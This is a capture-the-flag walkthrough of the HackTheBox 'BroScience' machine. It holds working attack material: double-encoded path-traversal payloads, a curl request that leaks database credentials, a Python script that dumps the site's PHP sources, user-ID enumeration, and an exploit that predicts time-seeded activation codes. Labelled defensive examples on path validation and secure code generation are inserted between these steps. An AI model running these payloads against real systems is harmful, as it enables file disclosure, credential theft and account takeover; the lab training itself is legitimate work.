# BroScience WriteUp

[HackTheBox](https://app.hackthebox.com/machines/BroScience)

`export ip=10.10.11.195`

Add to /etc/hosts: `10.10.11.195 broscience.htb`

Nmap scan

```
PORT    STATE SERVICE
22/tcp  open  ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 df17c6bab18222d91db5ebff5d3d2cb7 (RSA)
|   256 3f8a56f8958faeafe3ae7eb880f679d2 (ECDSA)
|_  256 3c6575274ae2ef9391374cfdd9d46341 (ED25519)
80/tcp  open  http     Apache httpd 2.4.54
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: Did not follow redirect to https://broscience.htb/
443/tcp open  ssl/http Apache httpd 2.4.54 ((Debian))
| ssl-cert: Subject: commonName=broscience.htb/organizationName=BroScience/countryName=AT
| Not valid before: 2022-07-14T19:48:36
|_Not valid after:  2023-07-14T19:48:36
|_http-title: BroScience : Home
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.54 (Debian)
| tls-alpn:
|_  http/1.1
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
```

The http port redirects us to https.

Run an sqlmap test:

`sqlmap https://broscience.htb/login.php --forms --crawl=1 --level=4 --risk=3 --batch --dbs`

ffuf scan of / with directory-list-2.3-medium

```
[Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 66ms]
    * FUZZ: images
[Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 108ms]
    * FUZZ: includes
[Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 98ms]
    * FUZZ: manual
[Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 129ms]
    * FUZZ: javascript
[Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 129ms]
    * FUZZ: styles
[Status: 200, Size: 9306, Words: 3953, Lines: 147, Duration: 128ms]
    * FUZZ: 
[Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 76ms]
    * FUZZ: server-status
```

Found an interesting file in includes

![](https://i.imgur.com/hw9uwPd.png)

db_connect first of all!
Subdomain fuzzing

`ffuf -u https://broscience.htb -H "Host: FUZZ.broscience.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fs 90334`

Nothing found.

Notice the strange way files are loaded :)

![](https://i.imgur.com/1eejkzL.png)

Try to exploit it

![](https://i.imgur.com/z0EoOr2.png)

The WAF blocks us.

- https://book.hacktricks.xyz/pentesting-web/file-inclusion
- https://github.com/omurugur/Path_Travelsal_Payload_List/blob/master/Payload/Dp.txt - path traversal payloads

Start fuzzing with the payloads (filter out responses of size 30 ("Attack was detected") and size 0)

```
wget https://github.com/omurugur/Path_Travelsal_Payload_List/raw/master/Payload/Dp.txt
ffuf -u "https://broscience.htb/includes/img.php?path=FUZZ" -w Dp.txt -fs 30 -fs 0
```

Got a few positive results

![](https://i.imgur.com/WUtVKav.png)

Looks like we can read files by using double URL encoding (curl with the --insecure flag to skip SSL checks)

![](https://i.imgur.com/LFVJ540.png)

Using the absolute path, get the creds from db_connect.php

```
../../../../var/www/html/includes/db_connect.php
curl https://broscience.htb/includes/img.php?path=%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%66%25%36%39%25%36%65%25%36%33%25%36%63%25%37%35%25%36%34%25%36%35%25%37%33%25%32%66%25%36%34%25%36%32%25%35%66%25%36%33%25%36%66%25%36%65%25%36%65%25%36%35%25%36%33%25%37%34%25%32%65%25%37%30%25%36%38%25%37%30 --insecure
```

```php
<?php
$db_host = "localhost";
$db_port = "5432";
$db_name = "broscience";
$db_user = "dbuser";
$db_pass = "RangeOfMotion%777";
$db_salt = "NaCl";

$db_conn = pg_connect("host={$db_host} port={$db_port} dbname={$db_name} user={$db_user} password={$db_pass}");

if (!$db_conn) {
    die("<b>Error</b>: Unable to connect to database");
}
?>
```

Dump the other PHP files
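Why the double-encoded payload gets through: the traversal check runs on the value after one percent-decode, but the file is opened after a second decode, so `%252e%252e%252f` looks harmless to the check and becomes `../` at open time. The following is an added example (mine, not code from the box or from this write-up) that models that mismatch in Python and shows the check `img.php` should have made instead: decode once, refuse anything that still contains `%`, and confine the resolved path to the image directory. `IMAGE_ROOT` is an assumed directory and `encode_all_twice` rebuilds the write-up's encoding for the sample input.

```python
import os
from urllib.parse import unquote

# Assumed base directory for served images (constructed for this example).
IMAGE_ROOT = os.path.realpath("/var/www/html/images")


def encode_all_twice(s: str) -> str:
    """Same construction as the write-up's exploit: percent-encode every byte, twice."""
    once = "".join(f"%{ord(c):02x}" for c in s)
    return "".join(f"%{ord(c):02x}" for c in once)


def naive_filter_passes(raw_query_value: str) -> bool:
    """Models a filter that inspects the once-decoded value only."""
    once = unquote(raw_query_value)
    return "../" not in once and "..\\" not in once


def naive_resolve(raw_query_value: str) -> str:
    """Models an application that decodes a second time before opening the file."""
    twice = unquote(unquote(raw_query_value))
    return os.path.normpath(os.path.join(IMAGE_ROOT, twice))


def safe_resolve(raw_query_value: str):
    """Hardened resolution: decode exactly once, reject leftover encoding,
    traversal segments, NUL bytes and absolute paths, then require the
    canonical result to stay under IMAGE_ROOT. Returns None on rejection."""
    once = unquote(raw_query_value)
    if not once or "%" in once or "\x00" in once:
        return None  # a second encoding layer is never legitimate here
    if os.path.isabs(once) or ".." in once.replace("\\", "/").split("/"):
        return None
    candidate = os.path.realpath(os.path.join(IMAGE_ROOT, once))
    # realpath collapses symlinks and "..": the result must remain inside the root
    if os.path.commonpath([IMAGE_ROOT, candidate]) != IMAGE_ROOT:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample inputs: a benign name and the double-encoded traversal
    for raw in ("logo.png", encode_all_twice("../../../../etc/passwd")):
        print(raw[:40], "filter:", naive_filter_passes(raw),
              "naive:", naive_resolve(raw), "safe:", safe_resolve(raw))
```

The decisive line is the `%` check: after the one decode the web server already performs, a legitimate file name never contains a percent sign, so any that survives is a second encoding layer and can be rejected before it is ever resolved.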
https://stackoverflow.com/questions/67629248/how-do-i-urlencode-all-the-characters-in-a-string-including-safe-characters - to encode all letters

1. Write the exploit

```python
import sys
import requests
from urllib3 import disable_warnings
from urllib3.exceptions import InsecureRequestWarning


def encode_all(string):
    # percent-encode every character, including "safe" ones
    return "".join("%{0:0>2}".format(format(ord(char), "x")) for char in string)


disable_warnings(InsecureRequestWarning)
url = 'https://broscience.htb'
arr = [
    'index.php',
    'user.php',
    'exercise.php',
    'includes/utils.php',
    'includes/navbar.php',
    'includes/img.php',
    'includes/header.php',
    'includes/db_connect.php',
    'login.php',
    'register.php',
    'comment.php',
]
root_path = '../../../../var/www/html/'
# optionally pass other paths (relative to /) on the command line
if len(sys.argv) > 1:
    arr = sys.argv[1:]
    root_path = '../../../../'

for path in arr:
    full_path = root_path + path
    encoded = encode_all(full_path)
    encoded = encode_all(encoded)  # double encoding is what gets past the filter
    print(encoded)
    response = requests.get(f'{url}/includes/img.php?path={encoded}', verify=False)
    if response.text:
        # save under the file's basename in the current directory
        with open(path.split('/')[-1], 'w') as f:
            f.write(response.text)
```

![](https://i.imgur.com/qzyb9IQ.png)

Dump all users from the site

1. Generate all numbers: `python -c "print('\n'.join(map(str, range(1000))))" > numbers`
2. `ffuf -u "https://broscience.htb/user.php?id=FUZZ" -w numbers -fs 1313,1309` (filter out the 'No user with that ID' and 'Empty ID value' errors)

Usernames

```
admin - admin@aegjgj.com
murali - murali@broscience.htb
elsa - elsa@gmail.com
administrator - administrator@broscience.htb
bill - bill@broscience.htb
michael - michael@broscience.htb
john - john@broscience.htb
dmytro - dmytro@broscience.htb
```

Passwords

```
RangeOfMotion%777
```

https://github.com/RoqueNight/LFI---RCE-Cheat-Sheet

Notice that the code generator's randomness depends only on the time!
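The weakness is that `srand(time())` leaves the activation code with no secret at all: anyone who knows roughly when the account was created can regenerate it. The following is an added example (mine, not the box's PHP and not the write-up's scripts) that mirrors the time-seeded pattern in Python to show its determinism, beside the hardened flow a registration handler should use: a CSPRNG-generated code, stored only as a hash, compared in constant time and invalidated after one use. The Python PRNG does not reproduce PHP's `rand()` stream; only the structure of the flaw is mirrored. `issue_activation`, `activate` and the in-memory `store` are assumptions for the example.

```python
import hashlib
import random
import secrets
import string

# Same 62-character alphabet as the site's generator
ALPHABET = string.ascii_letters + string.digits
CODE_LENGTH = 32


def predictable_code(seed: int, length: int = CODE_LENGTH) -> str:
    """Mirrors the flawed pattern: the only entropy is the seed (a Unix timestamp).
    Same seed -> same code, every time."""
    rng = random.Random(seed)
    return "".join(rng.choice(ALPHABET) for _ in range(length))


def secure_code(length: int = CODE_LENGTH) -> str:
    """Hardened generator: draws from the OS CSPRNG, so there is no seed to guess."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def _digest(code: str) -> str:
    return hashlib.sha256(code.encode()).hexdigest()


def issue_activation(store: dict, username: str) -> str:
    """Create a code for a new account; persist only its hash (hypothetical store)."""
    code = secure_code()
    store[username] = _digest(code)
    return code  # sent to the user out of band (e.g. by e-mail)


def activate(store: dict, username: str, supplied: str) -> bool:
    """Constant-time comparison against the stored hash; a code works once."""
    expected = store.get(username)
    if expected is None or len(supplied) != CODE_LENGTH:
        return False
    if not secrets.compare_digest(_digest(supplied), expected):
        return False
    del store[username]  # one-shot: a replayed code must fail
    return True


if __name__ == "__main__":
    # Constructed timestamp: two calls with the same seed give the same code
    print(predictable_code(1670000000) == predictable_code(1670000000))
    db = {}
    issued = issue_activation(db, "demo")
    print(activate(db, "demo", issued), activate(db, "demo", issued))
```

A code reviewer can spot the original flaw without running anything: any call to `srand()`/`mt_srand()` with a value derived from the clock, followed by `rand()` to build a secret, is the same defect; PHP's `random_int()` or `random_bytes()` are the equivalents of `secrets` here.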
![](https://i.imgur.com/zad7bM4.png)

Let's exploit it by generating the same code during the registration process

```python
import requests
import random
import string
import subprocess

session = requests.session()


def gen_code():
    # runs the PHP generator below; it prints three candidate codes separated by '|'
    generator = "gencode.php"
    return subprocess.check_output(['php', generator]).decode()


# random username so the registration does not collide with an existing account
username = ''.join([random.choice(string.ascii_letters) for _ in range(50)])
email = username + "@asd.ru"
data = {
    "username": username,
    "email": email,
    "password": "aboba",
    "password-confirm": "aboba"
}
print(data)
r = session.post('https://broscience.htb/register.php', data=data, verify=False)
print(r.text)
# generate the codes right after the registration request (for t-1, t and t+1)
codes = gen_code().split('|')
for code in codes:
    r = session.get(f'https://broscience.htb/activate.php?code={code}', verify=False)
    print(r.text)
```

`gencode.php`

```php
<?php
function generate_activation_code($seed) {
    $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
    srand($seed);
    $activation_code = "";
    for ($i = 0; $i < 32; $i++) {
        $activation_code = $activation_code . $chars[rand(0, strlen($chars) - 1)];
    }
    return $activation_code;
}

print generate_activation_code(time() - 1);
print "|";
print generate_activation_code(time());
print "|";
print generate_activation_code(time() + 1);
?>
```

Nice, now we have an activated account

![](https://i.imgur.com/VzIeapx.png)

![](https://i.imgur.com/7UjyhF1.png)

```
{'username': 'KXkIynBxmQvKFiyLXvewABkAYKPQermThiLMLqBIQHxgIVTmee', 'email': 'KXkIynBxmQvKFiyLXvewABkAYKPQermThiLMLqBIQHxgIVTmee@asd.ru', 'password': 'aboba', 'password-confirm': 'aboba'}
```

Now we can swap the theme

![](https://i.imgur.com/1Vr93p8.png)

https://systemweakness.com/log-poisoning-to-remote-code-execution-lfi-curl-7c49be11956

![](https://i.imgur.com/GiO2Whl.png)

Takeaways for our team:

1. Don't forget the UDP scan
2. Always build a site map, since we missed files when dumping the sources
3. Learn PHP better
4. Read the sources carefully once they are available
5. The writeup was written well, keep doing it the same way